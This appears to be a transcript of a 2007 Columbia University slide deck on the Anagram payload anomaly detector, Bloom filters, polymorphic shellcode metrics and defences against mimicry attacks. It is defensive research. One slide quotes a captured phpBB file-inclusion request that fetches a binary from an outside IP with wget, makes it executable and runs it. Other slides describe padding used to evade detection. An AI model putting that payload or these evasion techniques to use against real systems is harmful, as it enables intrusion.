Contentbased Anomaly Detection - PowerPoint PPT Presentation

1 / 51
About This Presentation
Title:

Contentbased Anomaly Detection

Description:

3-grams are not long enough to distinguish malicious byte sequences from normal ones ... mimicry attacks is by crafting small pieces of exploit code with a ... – PowerPoint PPT presentation

Number of Views:36
Avg rating:3.0/5.0
Slides: 52
Provided by: mlsnips07
Category:

less

Transcript and Presenter's Notes

Title: Contentbased Anomaly Detection


1
Content-based Anomaly Detection
  • Salvatore J. Stolfo
  • Columbia University
  • Department of Computer Science
  • IDS Lab

December 2007
2
Colaborators
  • Gabriela Cretu
  • Angelos Keromytis
  • Mike Locasto
  • Janak Parekh
  • Angelos Stavrou
  • Yingbo Song
  • Ke Wang

3
Agenda
  • Anagram payload anomaly detection algorithm (Post
    Payl)
  • The Polymorphic Threat
  • Countering Adversarial training/mimicry attacks
  • Randomized modeling/testing

4
Conjecture and Goal
  • Detect Zero-Day Exploits via Content Analysis
  • Worms propagation detectable via flow
    statistics (except perhaps slow worms)
  • Targeted Attacks (sophisticated, stealthy, no
    loud and obvious propagation/behavior)
  • True Zero-day will manifest as never before seen
    data
  • Learn typical/normal data, detect abnormal data
  • Desiderata Accuracy, efficiency, scale,
  • counter-evasion (resist training and
    mimicry attack)
  • Minimize false negatives
  • Minimize resource consumption too (Think MANETS)

5
Goal
  • We seek to model normal payload
  • Ingress from external sources to servers
  • Egress from servers to external sources
  • Egress from clients within a LAN
  • We model content flows that are cleartext
  • Learn typical/normal data to detect abnormal
    data need not be perfect
  • Whitelisted data deemed normal passes
  • Blacklisted data filtered
  • Suspicious data deemed abnormal, subjected to
    deeper analysis, eg., emulation
  • Overall Goal for system
  • Dont negatively impact operations
  • maintain throughput, minimize latency, minimize
    cost

6
(No Transcript)
7
Previous work PAYL
  • Models length conditioned character frequency
    distribution (1-gram) of normal traffic
  • Testing Mahalanobis distance of the test packet
    against the model
  • Pro
  • Simple, fast, memory efficient
  • Con
  • Cannot capture attacks displaying normal byte
    distribution
  • Easily fooled by mimicry attacks with proper
    padding

8
Example phpBB forum attack
GET /modules/Forums/admin/admin_styles.php?phpbb_r
oot_pathhttp//81.174.26.111/cmd.gif?cmdcd20/t
mpwget20216.15.209.4/crimanchmod2074420criman
./crimanecho20YYYecho..HTTP/1.1.Host.128.59.
16.26.User-Agent.Mozilla/4.0.(compatible.MSIE.6.
0.Windows.NT.5.1)..
  • Relatively normal byte distribution, so PAYL
    misses it
  • What we need capture order dependence of byte
    sequences
  • PAYL Frequency-based modeling of n-grams (ngt1) is
    infeasible here since feature space is huge
    requiring long training time
  • Anagram higher order n-grams (ngt1) modeling is
    possible

9
Why n-grams?
  • Easily extracted feature from packet payload
    flows
  • Language/protocol independent

10
Overview of Anagram
  • Binary-base high order n-gram modeling
  • Store all the distinct n-grams appearing in the
    normal training data
  • During test, compute the percentage of never-seen
    distinct n-grams out of the total n-grams in a
    packet
  • Semi-supervised
  • Normal traffic is modeled
  • Prior known malicious traffic is modeled Snort
    Rules, captured malcode
  • Model is space-efficient by using Bloom filters
    with gzip
  • Normal 7-gram BF 16 MB -gt 1.2MB after gzip
  • Malicious mixed 2-9-gram BF 8 MB -gt 0.8MB
    after gzip
  • Accurate anomalous payload detection, even
    carefully crafted attacks/mimicry attacks
  • Fast correlation of multiple alerts while
    preserving privacy by using Bloom filter
    representation of anomalous payload
  • Generate robust attack signatures

11
Bloom filter
  • A Bloom filter (BF) is a one-way data structure
    that supports insert and verify operations, yet
    is fast and space-efficient
  • Represented as a bit vector bit b is set if
    hi(e) b, where hi is a hash function and e is
    the element in question
  • No false negatives, although false positives are
    possible in a saturated BF via hash collisions
    use multiple hash functions for robustness
  • Each n-gram is a candidate element to be inserted
    or verified in the BF
  • Bloom filters are also privacy-preserving, since
    n-grams cannot be extracted from the resulting
    bit vector
  • Exhaustive dictionary attack may reveal grams
  • Frequency of grams not available, reconstruction
    very hard

12
(No Transcript)
13
Overview of Anagram(Training BF models)
14
Overview of Anagram(Detection BF represents
anomalous packet data)
15
False positive rate (with 100 detection rate)
with different training time and n of n-grams
Normal traffic real web traffic collected of two
CUCS web servers Test worms CR, CRII, WebDAV,
Mirela, phpBB forum attack, nsiislog.dll buffer
overflow(MS03-022)
  • Low False positive rate PER PACKET (better per
    flow)
  • No significant gain after 4 days training
  • Higher order n-grams needs longer training time
    to build good model
  • 3-grams are not long enough to distinguish
    malicious byte sequences from normal ones

16
Anagram semi-supervised learning
  • Binary-based approach is simple and efficient,
    but too sensitive to noisy data
  • Avoid high entropy fields
  • Pre-compute a bad content model to discriminate
    using snort rules and collection of worm samples.
  • This model should match few normal packets,
    while able to identify malicious traffic (often,
    new exploits reuse portions of old exploits)
  • The model contains the distinct n-grams appearing
    in malcode collections not also in normal traffic
  • Use a small, clean dataset to exclude the normal
    n-grams appearing in the snort rules and virus.

17
Use of bad content model
  • Training ignore possible malicious n-grams
  • Packets with a max number of N-grams matching the
    bad content model are ignored
  • Packets with high matching score (gt5) ignored,
    since new attacks might reuse old exploit code.
  • Ignoring few packets is harmless for training
  • Testing scoring separates malicious from normal
  • If a never-seen n-gram also appears in the bad
    content model, give a higher weight factor t for
    it. (t5 in our experiment

18
The false positive rate (with 100 detection
rate) for different n-grams, under both normal
and semi-supervised training per packet rate
19
Yesterdays Newsliterally!
20
Can we get ahead of the enemy?
  • Polymorphism complicates everything and
    challenges assumptions
  • So, how well do current engines do?
  • Metrics to evaluate
  • Spectral imaging to visualize
  • Can we pre-compute malcode before the enemy and
    pre-model these yet to be seen in the wild?
  • GA Search to generate decoders

21
Analysis of the Polymorphic Threat
  • Goals
  • Analyze the effectiveness of current polymorphism
    techniques employed by Shellcoders to evade
    signature-based IDS
  • Develop metrics to quantify the strength of
    modern polymorphic engines and use it to analyze
    existing engines being used in the wild
  • Explore the threat for combining polymorphism
    with other evasion techniques such as blending
    attacks
  • Explore future theoretical limits for shellcode
    polymorphism

22
Why use Polymorphism?
  • Easy to use obfuscation technique to complicate
    detection
  • Basic Shellcode form NOPPAYLOADRETADDR
  • Basic cipher based polymorphism
  • 1 Cipher/encode payload
  • 2 Prepend a decoder in front.
  • 3 The shellcode will de-crypt itself as it
    executes!
  • Now only the decoder needs to be polymorphic.
  • Polymorphic Shellcode
    NOPDECODERCIPHER_TEXTRETADDR

23
Polymorphic Shellcode
  • Sample decoder from the open source CLET engine.
  • Only 35 bytes are needed to generate five layers
    of cipher operations.

How can we measure the effectiveness of these
polymorphic techniques? Modeling encrypted
portion is impossible. Need a metric to measure
decoder variants.
24
Strength Metrics for Polymorphism
  • Variation strength estimates the spread over
    n-space
  • (average of the square root of the covariance
    matrix eigenvalues that span the generated space
    of decoders)
  • Propagation strength estimates how different
    each decoder appears
  • (measures the expected distance between any two
    decoders)
  • Overall strength is the product of the two
    metrics. Some engines generate many decoders by
    shifting the order of operations. In this case,
    variation strength might be high but the
    propagation strength would be low.

25
Strength Metrics
  • To evaluate the strength of a polymorphic
    engine we take a shellcode sample and use it to
    generate 50,000 decoders. Extract the
    decoders and then use the metrics we presented.

Decoder polymorphism strengths for various
engines using our metric. We are also presenting
the scores for random strings with range 128 and
range 256
26
Strength Metrics
  • Another innovation spectral images.
  • Generate decoder samples, stack them together
    and display the stacked samples as an image. The
    invariants appears as stripes.

27
Exemplar Polymorphic Blending Engine
Combine CLET, ADMmutate, add our own blending
engine. Clet ciphers the shellcode. Leaves a
blending section open, execution doesnt reach
there.
  • ADMmutate hides CLETs NOP sled
  • Decoder and exploit section is randomized
  • Return address section is obfuscated with a
    blending aimed to some target distribution

Each row of pixels represents a fully working
shellcode nopdecodercipher-textopen-blend
retaddr
28
Polymorphic Blending Potential
  • The blending section sits outside the
    shellcodes inner loop and is never reached
    during execution. Attackers can fill this area
    with bytes sampled from the same distribution as
    the target network to bypass statistical IDS
    sensors.
  • The byte distribution of a sample target
    network.
  • Mahalanobis distance of the shellcode byte
    distribution to the target distribution as we
    enlarge the blending section.

29
Is N-space Saturated?
  • Theoretical Limits Of Polymorphism?
  • GA-search shows N-space Is Likely Saturated With
    X86 Code That Behaves Like Polymorphic
    Decoders.
  • Magnitude Of Decoders , N Is The
    Length Of The Decoder(30 Bytes). Number Of
    Atoms In The Universe Is Only .

30
Conclusion on Polymorphism
  • The metrics provide a means to quantify the
    strength of polymorphic engines relative to each
    other
  • Very sophisticated polymorphism techniques are
    already implemented and are a real threat
  • Experimental results show that there is virtually
    no limit to the ways decoders can be written
  • Signature based methods arent likely to work in
    the long term
  • The only hope?
  • Either instrument ALL systems with dynamic
    host-based tests
  • Or counter these evasion techniques with better
    content AD sensor
  • We do not yet know whether another modelling
    technique can effectively discriminate well
    enough between malicious or benign content

31
Counter Evasion
  • Blind the attacker from critical information
    using randomization techniques
  • We assume they know the algorithm and perhaps can
    know an estimate of the target distribution from
    some period of time, but they may not know the
    actual model used by a content AD sensor!
  • The enemy needs to know
  • Where to pad
  • Hide the packet locations where models are tested
  • What to pad
  • Hide the normal distribution
  • Length-conditioned model
  • Eg., Multiple Bloom filters per model
  • Hide the gram size
  • Random choice of n
  • When to pad
  • Re-compute models on a random schedule
  • Eg., Time-bounded Bloom filter models

32
Randomization against mimicry attacks
  • The general idea of payload-based mimicry attacks
    is by crafting small pieces of exploit code with
    a large amount of normal padding to make the
    whole packet look normal wrt some particular
    model
  • If we randomly choose the payload portion for
    modeling/testing, the attacker would not know
    precisely which byte positions it may have to pad
    to appear normal harder to hide the exploit
    code!
  • This is a general technique can be used for both
    PAYL and Anagram, or any other payload anomaly
    detector.
  • For Anagram, additional randomization, keep
    n-gram size a secret!

33
Randomized Modeling (1)
  • Separate the whole packet/session randomly into
    several (possibly interleaved) substrings or
    subsequences S1, S2, ..SN, and build one model
    for each of these randomly chosen portions
  • Test payload is divided accordingly

34
Randomization techniques (2)
  • Randomized Testing Simpler strategy that does
    not incur substantial overhead
  • Build one model for whole packet, randomize
    tested portions
  • Separate the whole packet randomly into several
    (possibly interleaved) partitions S1, S2, ..SN,
  • Score each randomly chosen partition separately

35
(No Transcript)
36
Randomization techniques (3)
  • Fine grained modeling of normal payload
  • Condition models on packet length or randomly
    chosen packet portions
  • Could incur large memory costs
  • Cluster adjacent models to reduce space for
    detector

37
Example of clustering models
  • Original models
  • Clustered models

38
Feedback-based learning with shadow servers
(correlation with server responses)
  • Training attacks attacker sends malicious data
    during training time to poison the model.
  • Bad content model cannot guarantee 100 detection
  • The most reliable way is using the feedback of
    some host-based shadow server to supervise the
    training
  • Also useful for adaptive learning to accommodate
    concept shifting
  • Anagram can be used as a first-line classifier to
    amortize the expensive cost of the shadow server
  • Only small percentage of the all traffic is sent
    to shadow server, instead of all
  • The feedback of shadow server can be improve the
    accuracy of Anagram

39
(No Transcript)
40
Minimize Latency
False Positive Rate is not the only
metric Sensor speed crucial for all
traffic Accuracy impacts latency Protected
system with shadow incurs latency True
Positives are filtered No latency for True
Negatives Some latency for False Positives L
operational latency per request O shadow
server overhead (eg., 20) F false positive
rate of sensor L ((1-F)L) (LOF) Target L
L at 1, if O20, F can be as high as 10
41
Thank you!
42
With huge feature space of high order n-grams,
when is the model well trained? How likely we
will see new normal n-grams?
The likelihood of seeing new n-grams, which is
the percentage of the new distinct n-grams out of
every 10,000 packets when we train up to 500
hours of traffic data
43
Distribution of bad content matching scores for
normal packets (left) and attack packets
(right). The matching score is the percentage
of the n-grams of a packet that match the bad
content model
44
Cross-site collaboration Content alert sharing
  • Principles
  • Each site has a distinct content flow
  • Diversity via content (not system or software)
  • Higher standard to confound mimicry attack
  • Exploit writers/attackers have to learn the
    distinct content traffic patterns of many
    different sites
  • If multiple sites see the same/similar content
    alerts, its highly likely to be a true
    worm/targeted outbreak
  • Each site corroborates its evidence
  • Reduces false positives by creating white lists
    of those alerts that cannot be correlated

45
Anagram privacy preserving cross-site
collaboration
  • The anomalous n-grams of suspicious payload are
    stored in a Bloom filter, and exchanged among
    sites
  • By checking the n-grams of local alerts against
    the Bloom filter alert, its easy to tell how
    similar the alerts are to each other
  • The common malicious n-grams can be used for
    general signature generation, even for
    polymorphic worms
  • Privacy preserving with no loss of accuracy

46
Counter Evasion Collaborative Sharing of
Suspicious Content (DNAD-2/AEOLOS) PI Sal Stolfo
Columbia University Tel. (212) 939-7080, E-Mail
sal_at_cs.columbia.edu
  • Objective
  • Validate suspect anomalous content detected
    locally
  • as a true new attack exploit
  • - Identify anomalous content indicative of
    attack, or botnet
  • command and control or malware embedded in
    docs
  • - Resist Mimicry and Training Attacks
  • - Cross site validation to detect True
    Positives
  • - Preserve privacy of shared data among sites
  • Contract Army Research Office, No. DA
    W911NF-04-1-0442
  • Budget FY05-07 NSA MIPR/ARO 420K

Continuous, semi-supervised learning of new
attack exploits cross site validation
  • Accomplishments
  • Developed the new Anagram sensor shown to resist
  • mimicry attack
  • Developed new quantifiable, privacy preservation
  • techniques for cross-domain sharing
  • l Collaborating with NSA and other organizations
    to test
  • Challenges
  • l Cross-site collaborators and managing privacy
    policies
  • Develop interchange and interfaces for content
  • submission
  • Scientific/Technical Approach
  • Anagram anomaly detector based upon randomized
  • models countering mimicry attacks
  • l Use privacy-preserving one-way Bloom filter
    data
  • structure to share anomalous content among
    sites and
  • correlate to filter out false positives
  • l Robust signatures extracted from Bloom filters

47
DNAD
  • Goal develop a new paradigm for intrusion alert
    information sharing while maintaining compliance
    with information disclosure restrictions and
    privacy policies
  • Support rich, varied types of intrusion alerts
    and models/profiles of behavior
  • Critical to get accurate global view on threats
    rapidly to enable defense mechanisms
  • IRB/legal roadblocks prevented wide scale
    deployment

48
DNAD corroboration model
  • Transmit privacy-preserving transforms of IDS
    alerts, extend beyond headers to network traffic
    payloads and other models
  • Build a robust, temporal-enabled corroboration
    infrastructure able to match alerts (and
    fragments of alerts) across sites
  • Use of compact Bloom filters and n-gram analysis
    for fast, robust encoding
  • Automatic suspect signature generation

49
A graphical viewthink P2P
50
What if we exchange models too?
Models
51
Training data sanitization
  • Motivation
  • Focus on zero-day attacks, but
  • Anomaly detection performance can be improved by
    using clean training data
  • Attacks appearing in training data can
    deteriorate detection performance
  • False positives create excessive noise
  • Method
  • Use a large set of (distributed and diverse)
    training data of network packet payloads from
    multiple domains
  • Divide data into multiple blocks
  • Build models for each block and exchange models
    (privacy-preservation)
  • Test all models against a local smaller dataset
  • Voting algorithms( bagging predictors ) to
    determine false false positives and true
    positives
  • Clean data based on previous step
Write a Comment
User Comments (0)
About PowerShow.com